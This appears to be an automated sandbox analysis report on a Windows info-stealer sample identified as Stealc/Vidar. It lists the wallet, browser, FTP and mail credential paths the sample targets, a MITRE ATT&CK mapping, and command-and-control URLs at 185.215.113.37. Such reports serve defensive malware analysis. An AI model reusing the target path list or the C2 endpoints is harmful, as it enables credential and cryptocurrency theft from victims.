Source: file.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe, 00000000.00000002.1917116646.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: file.exe	String found in binary or memory: n\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Led
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe, 00000000.00000002.1917116646.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.o

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 6936, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1917116646.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1689803053.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 6936, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	345 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	651 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Name	Malicious	Reputation
http://185.215.113.37/	true	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	FIDHIEBA.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	FBKFCFBFIDGCGDHJDBKFHCFBGI.0.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	file.exe, 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	FIDHIEBA.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dlls	file.exe, 00000000.00000002.1917116646.0000000000E92000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll5	file.exe, 00000000.00000002.1917116646.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.37/e2b1563c6670f193.phpBRj	file.exe, 00000000.00000002.1917116646.0000000000E40000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	file.exe, 00000000.00000002.1917116646.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJKJEBGHJJKEBGI.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/AS	file.exe, 00000000.00000002.1917116646.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll~	file.exe, 00000000.00000002.1917116646.0000000000E92000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.37/e2b1563c6670f193.php_U	file.exe, 00000000.00000002.1917116646.0000000000E40000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	FIDHIEBA.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37	file.exe, 00000000.00000002.1917116646.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpog	file.exe, 00000000.00000002.1917116646.0000000000E40000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	file.exe, 00000000.00000003.1769597947.000000001D3CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpCoinomi	file.exe, 00000000.00000002.1917116646.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	HJKJEHJKJEBGHJJKEBGI.0.dr	false		unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Visual	file.exe, 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmp	false		unknown
http://185.215.113.37e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	FIDHIEBA.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpy	file.exe, 00000000.00000002.1917116646.0000000000E92000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.37/e2b1563c6670f193.phpser	file.exe, 00000000.00000002.1917116646.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.37/e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmp	false		unknown
http://185.215.113.37/e2b1563c6670f193.phpnte	file.exe, 00000000.00000002.1917116646.0000000000E40000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	file.exe, 00000000.00000002.1917116646.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJKJEBGHJJKEBGI.0.dr	false		unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.1929460655.000000001D4C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1938299746.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false		unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY	file.exe, 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	file.exe, 00000000.00000002.1917116646.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJKJEBGHJJKEBGI.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	FIDHIEBA.0.dr	false		unknown
http://185.215.113.37/e2b1563c6670f193.php=C9	file.exe, 00000000.00000002.1917116646.0000000000E40000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.37u#	file.exe, 00000000.00000002.1917116646.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	file.exe, 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpCOF	file.exe, 00000000.00000002.1917116646.0000000000E40000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	FIDHIEBA.0.dr	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	file.exe, 00000000.00000002.1917116646.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, HJKJEHJKJEBGHJJKEBGI.0.dr	false		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	file.exe, file.exe, 00000000.00000003.1769597947.000000001D3CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	file.exe, 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	FIDHIEBA.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	FBKFCFBFIDGCGDHJDBKFHCFBGI.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dlly	file.exe, 00000000.00000002.1917116646.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	FIDHIEBA.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php-	file.exe, 00000000.00000002.1917116646.0000000000E92000.00000004.00000020.00020000.00000000.sdmp	false		unknown
